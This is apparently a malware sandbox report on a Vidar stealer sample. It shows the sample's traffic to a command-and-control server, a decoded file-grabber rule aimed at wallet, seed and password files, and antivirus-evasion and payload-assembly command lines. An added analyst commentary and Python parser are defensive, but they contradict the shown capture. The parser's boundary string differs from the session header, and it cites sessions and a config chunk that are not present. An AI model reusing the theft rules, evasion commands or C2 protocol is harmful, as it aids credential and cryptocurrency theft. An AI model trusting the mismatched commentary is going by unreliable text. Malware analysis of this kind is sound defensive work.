                                                                                      2024-08-29 18:49:58 UTC16355OUTData Raw: 55 55 55 47 67 59 55 55 67 6f 4e 4d 41 6f 6f 6f 6f 41 4b 53 6c 70 44 51 4d 4b 4b 4b 4b 41 43 6b 6f 6f 4e 4d 41 6f 6f 6f 70 6a 45 6f 6f 4e 46 41 42 52 53 55 74 41 77 6f 70 4b 57 67 41 70 4b 4b 4b 59 43 30 5a 70 4b 53 67 43 53 49 2f 76 55 2f 33 68 2f 4f 74 2b 38 50 2b 6d 53 2f 57 75 66 54 2f 57 4c 2f 41 4c 77 72 66 76 50 2b 50 75 54 36 2f 77 42 4b 35 36 76 78 6f 53 2b 49 68 6f 70 4b 51 31 4a 6f 4c 52 53 55 55 79 67 4e 4c 53 55 5a 6f 45 4c 53 55 55 55 44 43 69 69 69 6d 41 75 61 4d 38 30 32 6c 39 36 51 57 48 5a 39 52 52 6b 47 6d 30 55 57 46 59 69 76 76 2b 51 66 4a 2f 76 4c 56 58 54 50 76 53 2f 51 56 5a 76 54 2f 77 41 53 2b 62 36 72 2f 4f 71 75 6d 48 35 35 50 6f 4b 75 50 77 4d 44 53 78 51 4d 2b 6c 47 61 4d 31 6d 49 57 69 67 48 32 70 63 30 41 4a 6a 69 69 6c 7a
                                                                                      Data Ascii: UUUGgYUUgoNMAooooAKSlpDQMKKKKACkooNMAooopjEooNFABRSUtAwopKWgApKKKYC0ZpKSgCSI/vU/3h/Ot+8P+mS/WufT/WL/ALwrfvP+PuT6/wBK56vxoS+IhopKQ1JoLRSUUygNLSUZoELSUUUDCiiimAuaM802l96QWHZ9RRkGm0UWFYivv+QfJ/vLVXTPvS/QVZvT/wAS+b6r/OqumH55PoKuPwMDSxQM+lGaM1mIWigH2pc0AJjiilz
                                                                                      2024-08-29 18:49:58 UTC16355OUTData Raw: 4d 55 58 43 34 6d 4b 58 48 46 4c 69 6c 78 53 75 49 62 69 69 6e 59 6f 41 6f 75 46 78 75 4b 57 6e 59 78 32 6f 78 53 75 46 78 41 4b 74 57 41 2f 30 6e 2f 74 6d 2b 66 2b 2b 54 56 66 46 57 72 49 66 76 7a 2f 31 7a 66 2f 30 45 31 6e 55 2b 46 6b 74 6e 42 53 64 65 76 65 6f 69 66 58 6a 48 70 55 73 68 2b 59 31 45 54 58 70 64 45 64 38 64 68 75 65 4d 6d 6b 50 34 55 70 36 30 68 7a 36 56 4a 61 47 6e 70 53 66 53 6c 37 30 68 70 4d 6f 44 53 47 6c 49 34 78 2b 74 49 65 74 53 4d 53 6d 38 34 70 78 35 48 34 30 6d 63 48 4e 49 59 68 34 37 39 61 61 65 61 63 66 61 6d 6e 31 39 36 52 53 41 38 30 68 39 2b 31 4c 53 5a 34 6f 47 48 58 74 53 59 39 2b 61 4d 35 6f 4a 39 36 51 41 54 6b 65 39 4a 53 6e 4a 70 4d 59 4e 41 7a 30 4f 6b 70 61 4b 79 50 6b 68 4b 57 69 69 67 42 4b 4b 4b 4b 42 68 52 52
                                                                                      Data Ascii: MUXC4mKXHFLilxSuIbiinYoAouFxuKWnYx2oxSuFxAKtWA/0n/tm+f++TVfFWrIfvz/1zf/0E1nU+FktnBSdeveoifXjHpUsh+Y1ETXpdEd8dhueMmkP4Up60hz6VJaGnpSfSl70hpMoDSGlI4x+tIetSMSm84px5H40mcHNIYh479aaeacfamn196RSA80h9+1LSZ4oGHXtSY9+aM5oJ96QATke9JSnJpMYNAz0OkpaKyPkhKWiigBKKKKBhRR
                                                                                      2024-08-29 18:49:58 UTC16355OUTData Raw: 2f 2f 41 49 6d 6a 2f 68 4c 74 66 2f 36 43 54 66 38 41 66 6d 50 2f 41 4f 4a 72 6c 72 69 2f 54 7a 35 49 4c 58 7a 6a 4e 35 31 6b 45 6a 6d 77 47 52 62 6c 4e 79 68 2b 42 68 67 32 41 66 71 4f 42 53 58 2b 71 32 6c 71 64 52 6c 68 6c 6c 6c 74 6f 6d 74 78 61 50 67 66 76 66 4f 58 65 4d 34 36 34 55 4e 6e 48 66 46 55 70 35 65 33 62 6c 2f 72 54 2f 4d 69 56 4c 4f 49 70 76 6d 65 6e 6e 36 2f 35 66 6b 58 77 41 41 41 4f 67 70 61 68 6c 75 72 56 64 58 30 32 79 6a 6e 6b 64 5a 37 31 64 50 75 53 41 4d 78 7a 68 6c 44 71 50 59 42 78 6a 50 6f 61 6f 54 65 49 74 4e 53 78 74 39 52 53 31 31 44 37 4e 4a 63 54 32 78 67 65 64 41 37 4e 48 74 2b 64 58 38 76 42 58 35 38 66 64 36 6a 72 58 58 48 4d 4d 50 6f 6f 76 66 59 38 39 35 50 6a 48 7a 53 6b 74 74 2f 6d 61 74 46 4e 6e 6e 74 7a 72 4f 6f 57
                                                                                      Data Ascii: //AImj/hLtf/6CTf8AfmP/AOJrlri/Tz5ILXzjN51kEjmwGRblNyh+Bhg2AfqOBSX+q2lqdRlhllltomtxaPgfvfOXeM464UNnHfFUp5e3bl/rT/MiVLOIpvmenn6/5fkXwAAAOgpahlurVdX02yjnkdZ71dPuSAMxzhlDqPYBxjPoaoTeItNSxt9RS11D7NJcT2xgedA7NHt+dX8vBX58fd6jrXXHMMPoovfY895PjHzSktt/matFNnntzrOoW
                                                                                      2024-08-29 18:49:58 UTC16123OUTData Raw: 39 4f 75 5a 74 53 31 47 35 2b 32 61 72 63 44 45 6b 32 4d 4b 69 2f 33 56 48 59 66 35 34 72 69 76 47 50 2f 41 43 4e 56 37 2f 32 7a 2f 77 44 52 61 31 65 42 6c 48 36 78 47 45 58 64 4a 50 55 34 38 34 6a 4c 36 6e 4b 63 6c 5a 74 72 51 77 71 53 6c 6f 72 33 7a 34 30 54 38 4b 4f 61 57 69 67 4c 69 55 59 70 61 54 4e 4d 42 61 53 69 6b 6f 41 58 69 6b 6f 6f 70 44 43 69 69 69 67 4c 42 53 55 74 49 61 41 43 69 69 69 67 41 6f 4e 46 46 41 78 4b 4b 4b 4b 41 43 6b 6f 4e 46 41 77 6f 6f 6f 6f 41 53 69 69 69 67 41 70 44 53 30 6c 41 77 6f 6f 6f 6f 41 53 69 69 69 67 59 6e 65 69 6c 70 4b 41 43 69 69 6b 6f 47 46 46 46 49 61 42 68 52 52 53 55 49 41 6f 4e 46 49 61 59 77 6f 6f 6f 6f 41 53 69 69 69 67 59 68 6f 70 61 53 67 41 70 4b 57 6b 6f 47 46 4a 51 61 4b 42 6f 4b 53 67 30 55 44 45 6f
                                                                                      Data Ascii: 9OuZtS1G5+2arcDEk2MKi/3VHYf54rivGP/ACNV7/2z/wDRa1eBlH6xGEXdJPU484jL6nKclZtrQwqSlor3z40T8KOaWigLiUYpaTNMBaSikoAXikoopDCiiigLBSUtIaACiiigAoNFFAxKKKKACkoNFAwooooASiiigApDS0lAwooooASiiigYneilpKACiikoGFFFIaBhRRSUIAoNFIaYwooooASiiigYhopaSgApKWkoGFJQaKBoKSg0UDEo
2024-08-29 18:50:00 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:50:00 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
2024-08-29 18:50:00 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0 (chunked encoding: one 2-byte chunk "ok" followed by the terminating zero-size chunk; the decoded body is "ok")


Session ID:23
Source IP:192.168.2.5
Source Port:59960
Destination IP:94.130.188.148
Destination Port:443
PID:2260
Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-29 18:50:01 UTC | 306 | OUT | POST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKF
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:50:01 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------EBGDAAKJJDAAKFHJKJKFCont
2024-08-29 18:50:01 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:50:01 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
2024-08-29 18:50:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0 (chunked encoding: only the terminating zero-size chunk, i.e. an empty response body)
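Sessions 20 to 23 above are one exchange repeated. The sample, running as Tenant.pif, POSTs a multipart/form-data body to 94.130.188.148 whose first two parts are a 32-hex-character `token` and `build_id` (the third part is cut off on the page after "Cont", so its name is unknown), and the server answers with a chunked body that is either empty (`0\r\n\r\n`), the string `ok`, or, in session 21, a 0x5e8-byte base64 chunk. Decoding the base64 prefix that is visible on the page gives `DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,...`, a pipe-separated file-grabber rule: a rule name, a base directory given as a placeholder, and a comma-separated list of file masks aimed at wallet, seed and credential files. The Python below is an added example, not Joe Sandbox output and not the sample's own code. It rebuilds the visible parts of the beacon body and the three reply bodies from the page's Data Ascii lines (constructed; everything the capture truncated is left out, so the body is shorter than the captured Content-Length of 331), parses the multipart form, undoes the chunked encoding including a chunk the capture cut short, and decodes the rule. Field names beyond `token` and `build_id`, and any rule fields after the masks, are not on the page and are not assumed.

```python
"""Parse the C2 exchange captured in sessions 20-22 above.

Added example (not Joe Sandbox or Vidar code). Request body, replies and the
base64 chunk are constructed from the page's Data Ascii lines; whatever the
capture truncated is omitted.
"""
import base64
import re

BOUNDARY = "----HIIEBAFCBKFIDGCAKKKF"      # from the session's Content-Type header
_DELIM = b"--" + BOUNDARY.encode()

# Constructed: the two parts visible on the page. The third part is truncated
# there ("Cont...") and is therefore not reproduced.
BEACON_BODY = (
    _DELIM + b'\r\nContent-Disposition: form-data; name="token"\r\n\r\n'
    b"a9a61d3e47c649c77fe9d5f87631f194\r\n"
    + _DELIM + b'\r\nContent-Disposition: form-data; name="build_id"\r\n\r\n'
    b"283e465e3e8feb6cb806690b98c9bf31\r\n"
    + _DELIM + b"--\r\n"
)

# Constructed from session 21's reply: chunk header 5e8 (1512 bytes) followed
# by the base64 prefix shown on the page; the rest of the chunk was not captured.
CONFIG_B64_PREFIX = (
    b"REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn"
)
CONFIG_RESPONSE = b"5e8\r\n" + CONFIG_B64_PREFIX
EMPTY_RESPONSE = b"0\r\n\r\n"               # sessions 20 and 23: empty chunked body
OK_RESPONSE = b"2\r\nok\r\n0\r\n\r\n"         # session 22: body is "ok"

HEX32 = re.compile(rb"^[0-9a-f]{32}$")


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: value} for every complete part of a multipart body."""
    delim = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):          # closing delimiter
            break
        head, sep, data = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if not sep:                         # part cut off before its body
            continue
        name = re.search(rb'name="([^"]*)"', head)
        if name:
            fields[name.group(1).decode()] = data[:-2] if data.endswith(b"\r\n") else data
    return fields


def decode_chunked(raw: bytes) -> bytes:
    """Undo HTTP chunked encoding; a chunk cut short by the capture is returned as far as it goes."""
    out = bytearray()
    pos = 0
    while True:
        end = raw.find(b"\r\n", pos)
        if end < 0:                         # no chunk header left (truncated capture)
            break
        size = int(raw[pos:end].split(b";")[0].strip(), 16)
        if size == 0:                       # terminating chunk
            break
        chunk = raw[end + 2:end + 2 + size]
        out += chunk
        if len(chunk) < size:               # the capture ends inside this chunk
            break
        pos = end + 2 + size + 2            # skip the data and its trailing CRLF
    return bytes(out)


def looks_like_beacon(fields: dict) -> bool:
    """The page's beacons carry a 32-hex token and build_id; use that as the shape check."""
    return all(HEX32.match(fields.get(k, b"")) is not None for k in ("token", "build_id"))


def decode_grabber_rule(b64: bytes) -> dict:
    """Decode the base64 config chunk into the pipe-separated fields visible on the page."""
    usable = b64[: len(b64) - len(b64) % 4]  # drop a trailing incomplete base64 group
    text = base64.b64decode(usable).decode("latin-1")
    name, path, masks = (text.split("|", 2) + ["", ""])[:3]
    return {"name": name, "path": path,
            "masks": [m for m in masks.split(",") if m],
            "partial": len(usable) != len(b64)}


if __name__ == "__main__":
    fields = parse_multipart(BEACON_BODY, BOUNDARY)
    print(fields, looks_like_beacon(fields))
    print(decode_chunked(EMPTY_RESPONSE), decode_chunked(OK_RESPONSE))
    print(decode_grabber_rule(decode_chunked(CONFIG_RESPONSE)))
```

Two caveats for anyone turning this into a detection. The destination port is 443, yet the page shows the exchange in cleartext; whether the sandbox decrypted TLS or the sample spoke plain HTTP on 443 is not stated, so a network rule built on these body shapes needs a TLS-inspecting vantage point. And the `token` and `build_id` values are this build's identifiers, useful as indicators for this sample but not as a generic signature; the shape check (two 32-hex form fields under a browser User-Agent with no filename) travels better.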



                                                                                      Target ID:0
                                                                                      Start time:14:46:51
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:913'051 bytes
                                                                                      MD5 hash:2F5226B4116CE79AFB6DCB32FA647954
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:14:46:52
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /k move Cashiers Cashiers.bat & Cashiers.bat & exit
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:14:46:52
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:14:46:54
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:tasklist
                                                                                      Imagebase:0xe30000
                                                                                      File size:79'360 bytes
                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:14:46:54
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:findstr /I "wrsa opssvc"
                                                                                      Imagebase:0x4c0000
                                                                                      File size:29'696 bytes
                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:6
                                                                                      Start time:14:46:54
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:tasklist
                                                                                      Imagebase:0xe30000
                                                                                      File size:79'360 bytes
                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:14:46:54
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                                      Imagebase:0x4c0000
                                                                                      File size:29'696 bytes
                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:8
                                                                                      Start time:14:46:55
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd /c md 271973
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:9
                                                                                      Start time:14:46:55
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:findstr /V "NorwegianLivedJerseyRelaxation" Para
                                                                                      Imagebase:0x4c0000
                                                                                      File size:29'696 bytes
                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:10
                                                                                      Start time:14:46:55
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd /c copy /b ..\Ventures + ..\Thousands + ..\Enhance + ..\Kept + ..\Everything + ..\Say C
                                                                                      Imagebase:0x790000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:11
                                                                                      Start time:14:46:55
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:Tenant.pif C
                                                                                      Imagebase:0xaa0000
                                                                                      File size:893'608 bytes
                                                                                      MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 5%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:12
                                                                                      Start time:14:46:55
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:choice /d y /t 5
                                                                                      Imagebase:0xb30000
                                                                                      File size:28'160 bytes
                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:17
                                                                                      Start time:14:50:03
                                                                                      Start date:29/08/2024
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 3264
                                                                                      Imagebase:0x420000
                                                                                      File size:483'680 bytes
                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true


                                                                                        Execution Graph

                                                                                        Execution Coverage:13.2%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:20.6%
                                                                                        Total number of Nodes:1523
                                                                                        Total number of Limit Nodes:39
401446 18 API calls 4905->4910 4909 4028fc lstrlenW 4906->4909 4908 4029ae RegSetValueExW 4907->4908 4912 40337f 37 API calls 4907->4912 4915 4029c6 RegCloseKey 4908->4915 4916 4029cb 4908->4916 4913 402918 4909->4913 4914 40292a 4909->4914 4917 402947 4910->4917 4918 40297b 4912->4918 4919 4062a3 11 API calls 4913->4919 4920 4062a3 11 API calls 4914->4920 4915->4911 4921 4062a3 11 API calls 4916->4921 4922 4062a3 11 API calls 4917->4922 4928 406224 4918->4928 4924 402922 4919->4924 4920->4905 4921->4915 4922->4907 4924->4908 4927 4062a3 11 API calls 4927->4924 4929 406247 4928->4929 4930 40628a 4929->4930 4931 40625c wsprintfW 4929->4931 4932 402991 4930->4932 4933 406293 lstrcatW 4930->4933 4931->4930 4931->4931 4932->4927 4933->4932 4934 402082 4935 401446 18 API calls 4934->4935 4936 402093 SetWindowLongW 4935->4936 4937 4030e3 4936->4937 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3640 403859 3483->3640 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3491 403ae1 3647 405ca0 3491->3647 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3651 406009 lstrcpynW 3493->3651 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3652 40677e 3503->3652 3507 403be6 
3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3682 406009 lstrcpynW 3509->3682 3681 406009 lstrcpynW 3510->3681 3515 403bef 3511->3515 3514 403b44 3683 406009 lstrcpynW 3514->3683 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3667 406009 lstrcpynW 3519->3667 3711 40141d 3520->3711 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3684 406805 3529->3684 3703 406c68 3529->3703 3708 405c3f CreateProcessW 3529->3708 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3714 406038 3546->3714 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3723 406722 lstrlenW CharPrevW 3549->3723 3730 405e50 GetFileAttributesW CreateFileW 3554->3730 3556 4035c7 3577 4035d7 3556->3577 3731 406009 lstrcpynW 3556->3731 3558 4035ed 3732 406751 lstrlenW 3558->3732 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3739 4032d2 3563->3739 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3773 403368 SetFilePointer 3565->3773 3750 403368 SetFilePointer 3567->3750 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3751 40337f 3571->3751 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3737 403336 ReadFile 3576->3737 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 
